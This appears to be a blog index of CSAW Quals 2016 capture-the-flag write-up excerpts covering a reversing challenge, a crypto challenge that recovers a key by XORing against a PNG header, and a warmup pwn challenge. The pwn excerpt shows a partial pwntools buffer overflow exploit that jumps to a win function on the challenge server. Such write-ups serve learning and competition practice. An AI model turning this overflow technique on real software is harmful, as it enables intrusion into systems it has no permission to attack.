CSAW Qual 2016::Rock::Rev-100

Posted by and filed under CSAW Quals 2016.

There is a struct in this program. struct Rock{ void *fp; int pass_fail; string *user_input1; string *user_input2; string *flag_str; }; Three interesting functions, which I have called init_struct, check_len_and_xor, and is_valid_key See the rest of this writeup here.

CSAW Qual 2016::Warmup::Pwn-50

Posted by and filed under CSAW Quals 2016.

This was a very easy challenge. Basically, there was a win function at the address that is bring printed : 0x40060D. This function can be called with a simple buffer overflow. Here is my Exploit.py from pwn import * win = 0x40060D payload = “A”*72 payload += p64(win) con = remote(‘pwn.chal.csaw.io’,8000) print con.recvline() print con.recvline()… Read more »

CSAW Qual 2016::Sleeping Guard::Crypto-50

Posted by and filed under CSAW Quals 2016.

With this challenge, they gave us an encrypted png. After a bit of trial and error I realized all I had to do was xor the first few bytes of the encrypted file with the standard header of a png. I just downloaded a sample file. Here is my get_key.py ecrypted = open(‘sleeping.png’,’rb’).read().decode(‘base64’) png =… Read more »